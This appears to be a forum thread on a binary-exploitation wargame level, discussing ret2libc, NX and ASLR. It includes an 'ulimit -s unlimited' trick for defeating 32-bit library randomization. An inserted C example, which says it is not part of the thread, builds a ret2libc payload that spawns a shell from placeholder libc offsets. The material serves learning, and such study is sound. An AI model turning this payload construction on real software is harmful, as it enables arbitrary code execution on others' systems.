
Meh, I got to level 4 but didn't go any further.

Learned a lot, but I'm still not sure if there wasn't a much simpler solution that I missed. Was return-to-libc really required to exploit it, or was I trying to kill a fly with a sledgehammer?




Return-to-libc (a.k.a. ret2libc) is usually used to bypass NX-bit / DEP, but NX was disabled for level04 - the solution does not require return-to-libc.


But it did have ASLR enabled, right? I didn't get how to bypass that without ret2libc.

I think I'll try again tomorrow morning and see what I missed.


On 32-bit machines, you can disable mmap randomization (and thus library randomization) using ulimit -s unlimited.

Also, there's another useful place you can return to that isn't in libc.


ASLR is enabled, yes.

ASLR actually makes ret2libc much more difficult to pull off (esp. on 64-bit platforms), because the location of libc.so itself is randomized.
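The mechanics the thread is arguing about, as an added example that is not part of the thread and not the challenge's own code: once you know where libc is loaded (from a leak, a non-randomized layout, or the ulimit trick mentioned above), a 32-bit ret2libc chain is just the libc base plus three offsets written over the saved return address. The maps excerpt, the binary name /tmp/vuln, the libc offsets and the 44-byte distance to the saved return address are all constructed placeholders; real offsets come from readelf/strings on the target's libc.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Constructed /proc/<pid>/maps excerpt for a 32-bit, non-PIE target.
 * Addresses and the binary name are made up for this example.
 */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /tmp/vuln\n"
    "08049000-0804a000 rw-p 00000000 08:01 1234       /tmp/vuln\n"
    "b7e2a000-b7fcd000 r-xp 00000000 08:01 5678       /lib/i386-linux-gnu/libc.so.6\n"
    "b7fcd000-b7fcf000 r--p 001a3000 08:01 5678       /lib/i386-linux-gnu/libc.so.6\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\n";

/* Hypothetical offsets inside libc; take real ones from the target's libc.so.6. */
#define OFF_SYSTEM 0x0003ada0u
#define OFF_EXIT   0x0002e9d0u
#define OFF_BINSH  0x0015ba0bu   /* offset of a "/bin/sh" string inside libc */

/* Returns the start of the first executable libc mapping in a maps dump, or 0 if none. */
uint32_t libc_base_from_maps(const char *maps)
{
    char buf[512];
    const char *p = maps;
    while (*p) {
        /* copy one line so sscanf cannot run into the next line */
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, p, len);
        buf[len] = '\0';

        unsigned long start = 0;
        char perms[8] = {0}, path[256] = {0};
        /* fields: start-end perms offset dev inode path */
        if (sscanf(buf, "%lx-%*lx %7s %*s %*s %*s %255s", &start, perms, path) == 3 &&
            perms[2] == 'x' && strstr(path, "libc") != NULL)
            return (uint32_t)start;

        p = eol ? eol + 1 : p + len;
    }
    return 0;
}

/* strcpy/gets-style overflows stop at 0x00, so an address with a zero byte cannot be copied whole. */
int addr_has_nul(uint32_t v)
{
    return (v & 0xff) == 0 || ((v >> 8) & 0xff) == 0 ||
           ((v >> 16) & 0xff) == 0 || (v >> 24) == 0;
}

/* Little-endian store, the byte order the 32-bit stack expects. */
static void put32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/*
 * Classic 32-bit ret2libc frame: filler up to the saved return address, then
 * system(), the address system() "returns" to (exit()), and system()'s argument.
 * Returns the payload length, or 0 if out is too small.
 */
size_t build_ret2libc(uint8_t *out, size_t out_len, size_t ret_offset,
                      uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr)
{
    size_t total = ret_offset + 12;
    if (out_len < total) return 0;
    memset(out, 'A', ret_offset);
    put32(out + ret_offset, system_addr);
    put32(out + ret_offset + 4, exit_addr);
    put32(out + ret_offset + 8, binsh_addr);
    return total;
}

int main(void)
{
    uint32_t base = libc_base_from_maps(SAMPLE_MAPS);
    if (!base) { fputs("no libc mapping found\n", stderr); return 1; }
    uint32_t sys = base + OFF_SYSTEM, ext = base + OFF_EXIT, sh = base + OFF_BINSH;
    printf("libc base 0x%08x  system 0x%08x  exit 0x%08x  /bin/sh 0x%08x\n", base, sys, ext, sh);
    if (addr_has_nul(sys) || addr_has_nul(ext) || addr_has_nul(sh))
        fputs("warning: an address contains a NUL byte\n", stderr);

    uint8_t payload[128];
    size_t n = build_ret2libc(payload, sizeof payload, 44, sys, ext, sh);  /* 44 is hypothetical */
    for (size_t i = 0; i < n; i++) printf("%02x%s", payload[i], (i + 1) % 16 ? " " : "\n");
    putchar('\n');
    return 0;
}
```

The base is the only input that ASLR changes between runs; the three offsets are fixed for a given libc build, which is why a single leaked pointer (or a non-randomized mapping) is enough to place the whole chain.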



